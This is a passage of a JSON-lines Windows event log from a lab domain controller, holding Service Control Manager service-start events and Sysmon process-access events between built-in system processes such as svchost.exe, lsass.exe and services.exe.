{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76811,"ProcessID":856,"ThreadID":924,"Channel":"System","Message":"The tiledatamodelsvc service entered the running state.","param1":"tiledatamodelsvc","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76812,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The ADWS service entered the running state.","param1":"ADWS","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76813,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The vds service entered the running state.","param1":"vds","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":952,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nSourceProcessId: 1224\r\nSourceThreadId: 2040\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010BCB40000}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","SourceProcessId":"1224","SourceThreadId":"2040","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010BCB40000}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":953,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nSourceProcessId: 1224\r\nSourceThreadId: 2040\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010BCB40000}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","SourceProcessId":"1224","SourceThreadId":"2040","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010BCB40000}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":954,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.141\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.141","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":955,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":956,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":957,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.141\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-00101A7C0100}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.141","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-00101A7C0100}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":958,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.141\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-00101A7C0100}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.141","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-00101A7C0100}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":959,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-00101A7C0100}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-00101A7C0100}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":960,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 